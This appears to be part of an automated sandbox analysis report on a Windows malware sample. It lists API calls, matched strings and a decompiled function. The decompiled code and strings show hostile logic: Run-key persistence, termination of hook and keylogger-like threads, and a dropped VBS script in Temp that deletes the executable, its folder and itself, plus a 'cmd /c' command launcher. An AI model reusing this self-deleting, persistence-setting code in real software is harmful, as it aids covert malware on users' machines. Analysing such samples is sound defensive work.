                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 00408867
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408874
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408880
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408889
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408892
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 004088A9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 004088C0
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088CB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088D8
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004088E5
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004088F1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004088FA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408903
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040890C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408915
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040891E
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 0040892C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408938
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408942
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040894E
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408967
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408974
                                  • exit.MSVCRT ref: 00408980
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408989
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408992
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040899B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@G@1@@V01@V10@Y?$basic_string@$D@2@@std@@D@std@@FileV01@@$TerminateV10@@$??9std@@AttributesThreadV10@0@$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                  • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 1819783940-1536747724
                                  • Opcode ID: 4bbe0cf9fda80b10b9bb67cd86d505d9185a0bf42035aa4b63660560c31d1dcd
                                  • Instruction ID: 422d0979f444bffee83793bc3d795cbcdb9f6e23a9fd2fc637ca2dc4c5c01907
                                  • Opcode Fuzzy Hash: 4bbe0cf9fda80b10b9bb67cd86d505d9185a0bf42035aa4b63660560c31d1dcd
                                  • Instruction Fuzzy Hash: 7DB15FB2800509EBCB04EBE0ED4D9EE777CEF94345B54407AF902A3191DF795A48CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 19%
                                  			E00408245() {
                                  				char _v0;
                                  				signed int _v5;
                                  				char _v6;
                                  				signed int _v9;
                                  				char _v10;
                                  				char _v24;
                                  				char _v28;
                                  				char _v40;
                                  				char _v44;
                                  				char _v56;
                                  				char _v60;
                                  				char _v72;
                                  				char _v76;
                                  				char _v88;
                                  				char _v92;
                                  				void* _v108;
                                  				void* _v124;
                                  				void _v606;
                                  				short _v608;
                                  				short _v644;
                                  				void* _t112;
                                  				void* _t114;
                                  				char* _t116;
                                  				WCHAR* _t118;
                                  				signed char _t120;
                                  				char* _t121;
                                  				char* _t123;
                                  				char* _t126;
                                  				char* _t127;
                                  				char* _t128;
                                  				short* _t131;
                                  				void* _t132;
                                  				char* _t134;
                                  				WCHAR* _t137;
                                  				char* _t138;
                                  				char* _t140;
                                  				char* _t143;
                                  				char* _t144;
                                  				char* _t145;
                                  				char* _t146;
                                  				signed int* _t148;
                                  				char* _t149;
                                  				char* _t150;
                                  				signed int _t151;
                                  				short* _t153;
                                  				char* _t154;
                                  				char* _t155;
                                  				WCHAR* _t157;
                                  				char* _t158;
                                  				char* _t159;
                                  				char* _t163;
                                  				WCHAR* _t165;
                                  				char* _t166;
                                  				char* _t167;
                                  				intOrPtr* _t174;
                                  				short* _t285;
                                  				void* _t297;
                                  				void* _t299;
                                  				void* _t301;
                                  				void* _t303;
                                  				void* _t304;
                                  				void* _t305;
                                  				void* _t306;
                                  				void* _t308;
                                  				void* _t310;
                                  
                                  				_t112 = E0040AC8C();
                                  				if( *0x41b154 != 0x30) {
                                  					_t112 = E00406D41(0x41b900);
                                  				}
                                  				if( *0x41c118 == 1) {
                                  					_t112 = E0041050F(_t112);
                                  				}
                                  				if( *0x41b22a != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t112 = E00412BEE(_t112);
                                  				}
                                  				_t172 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                  				if( *0x41ba58 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t112 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t112);
                                  					_t297 = _t297 + 0xc;
                                  				}
                                  				if( *0x41bc64 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t112 = E0040B9E8(0x80000002, _t172, _t112);
                                  					_t297 = _t297 + 0xc;
                                  				}
                                  				if( *0x41ba20 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t112);
                                  					_t297 = _t297 + 0xc;
                                  				}
                                  				_v608 = _v608 & 0x00000000;
                                  				_t114 = memset( &_v606, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t116 = E0040B692(0x80000001,  &_v608, "exepath",  &_v608, 0x208, _t114, _t114);
                                  				_t299 = _t297 + 0x28;
                                  				if(_t116 == 0) {
                                  					_t116 = GetModuleFileNameW(0,  &_v608, 0x208);
                                  				}
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				RegDeleteKeyA(0x80000001, _t116);
                                  				_t174 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
                                  				_v5 = 1;
                                  				_t118 =  *_t174(0x41bc68, 0x415800);
                                  				if(_t118 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					SetFileAttributesW(_t118, 0x80);
                                  				}
                                  				_t120 = SetFileAttributesW( &_v608, 0x80);
                                  				if(_t120 == 0) {
                                  					_v5 = _v5 & _t120;
                                  				}
                                  				_t121 =  &_v6;
                                  				__imp___wgetenv(L"Temp", _t121, L"\\uninstall.vbs");
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t121);
                                  				L00414146();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t121);
                                  				_t123 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t123);
                                  				L0041416A();
                                  				_t301 = _t299 + 0x18;
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v24, L"On Error Resume Next\n", _t123);
                                  				if(_v5 != 0) {
                                  					_t165 =  &_v608;
                                  					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t165,  &_v6, L"\")\n");
                                  					_t166 =  &_v72;
                                  					L0041416A();
                                  					_t167 =  &_v40;
                                  					L00414146();
                                  					_t301 = _t301 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t167, _t167, _t166, _t166, L"while fso.FileExists(\"", _t165);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t126 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t126,  &_v608, L"\"\n");
                                  				_t127 =  &_v72;
                                  				L00414146();
                                  				_t128 =  &_v56;
                                  				L00414146();
                                  				_t303 = _t301 + 0x18;
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t128, _t128, _t127, _t127, _t126);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_v5 != 0) {
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                  				}
                                  				_push(0x415800);
                                  				_push(0x41bc68);
                                  				if( *_t174() != 0) {
                                  					_t163 =  &_v72;
                                  					L0041416A();
                                  					_t129 =  &_v56;
                                  					L00414146();
                                  					_t303 = _t303 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t129, _t129, _t163, _t163, L"fso.DeleteFolder \"", 0x41bc68, L"\"\n");
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t131 = E00412D56( &_v24, _t129 << 1, _t129 << 1, _t129, 0);
                                  				_t304 = _t303 + 0x10;
                                  				if(_t131 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					ShellExecuteW(0, L"open", _t131, 0x415800, 0x415800, 0);
                                  				}
                                  				exit(0);
                                  				_pop(_t280);
                                  				_pop(_t291);
                                  				_pop(_t175);
                                  				_t305 = _t304 - 0x27c;
                                  				_t132 = E0040AC8C();
                                  				if( *0x41b154 != 0x30) {
                                  					_t132 = E00406D41(0x41b900);
                                  				}
                                  				if( *0x41c118 == 1) {
                                  					_t132 = E0041050F(_t132);
                                  				}
                                  				if( *0x41b22a != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t132 = E00412BEE(_t132);
                                  				}
                                  				_t176 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                  				if( *0x41ba58 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t132 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t132);
                                  					_t305 = _t305 + 0xc;
                                  				}
                                  				if( *0x41bc64 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t132 = E0040B9E8(0x80000002, _t176, _t132);
                                  					_t305 = _t305 + 0xc;
                                  				}
                                  				if( *0x41ba20 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t132 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t132);
                                  					_t305 = _t305 + 0xc;
                                  				}
                                  				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t134 = E0040B692(0x80000001,  &_v644, "exepath",  &_v644, 0x208, _t132, _t132);
                                  				_t306 = _t305 + 0x1c;
                                  				if(_t134 == 0) {
                                  					_t134 = GetModuleFileNameW(0,  &_v644, 0x208);
                                  				}
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				RegDeleteKeyA(0x80000001, _t134);
                                  				_v9 = 1;
                                  				_t137 = SetFileAttributesW( &_v644, 0x80);
                                  				if(_t137 == 0) {
                                  					_v9 = _v9 & _t137;
                                  				}
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                  				if(_t137 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					SetFileAttributesW(_t137, 0x80);
                                  				}
                                  				_t138 =  &_v10;
                                  				__imp___wgetenv(L"Temp", _t138, L"\\update.vbs");
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t138);
                                  				L00414146();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v92, _t138);
                                  				_t140 =  &_v10;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t140);
                                  				L0041416A();
                                  				_t308 = _t306 + 0x18;
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v44, L"On Error Resume Next\n", _t140);
                                  				if(_v9 != 0) {
                                  					_t157 =  &_v644;
                                  					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t157,  &_v10, L"\")\n");
                                  					_t158 =  &_v76;
                                  					L0041416A();
                                  					_t159 =  &_v28;
                                  					L00414146();
                                  					_t308 = _t308 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t159, _t159, _t158, _t158, L"while fso.FileExists(\"", _t157);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t285 = L"\"\n";
                                  				_t143 =  &_v10;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t143,  &_v644, _t285);
                                  				_t144 =  &_v76;
                                  				L00414146();
                                  				_t145 =  &_v60;
                                  				L00414146();
                                  				_t310 = _t308 + 0x18;
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t145, _t145, _t144, _t144, _t143);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_v9 != 0) {
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                  				}
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                  				if(_t145 != 0) {
                                  					_t154 =  &_v76;
                                  					L0041416A();
                                  					_t155 =  &_v60;
                                  					L00414146();
                                  					_t310 = _t310 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t155, _t155, _t154, _t154, L"fso.DeleteFolder \"", 0x41bc68, _t285);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t146 =  &_v10;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t146, "\n");
                                  				_t148 =  &_v9;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t148,  &_v0, _t146);
                                  				_t149 =  &_v28;
                                  				L0041414C();
                                  				_t150 =  &_v76;
                                  				L0041414C();
                                  				_t151 =  &_v60;
                                  				L00414146();
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t151, _t151, _t150, _t150, _t149, _t149, _t148);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t153 = E00412D56( &_v44, _t151 << 1, _t151 << 1, _t151, 0);
                                  				if(_t153 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t153 = ShellExecuteW(0, L"open", _t153, 0x415800, 0x415800, 0);
                                  					if(_t153 > 0x20) {
                                  						exit(0);
                                  					}
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t153;
                                  			}

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00408282
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082AC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082C8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082E8
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 00408321
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040832A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000208,00000000), ref: 0040834A
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408368
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00408370
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408378
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408394
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004083A6
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 004083AD
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 004083BF
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                    • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                  • _wgetenv.MSVCRT ref: 004083DA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004083E5
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004083F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083FB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 0040840D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 0040841D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408428
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00408447
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00408457
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408464
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408470
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408479
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408482
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040848B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004084A9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084B4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084C1
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004084CD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084D6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084DF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084E8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 004084FC
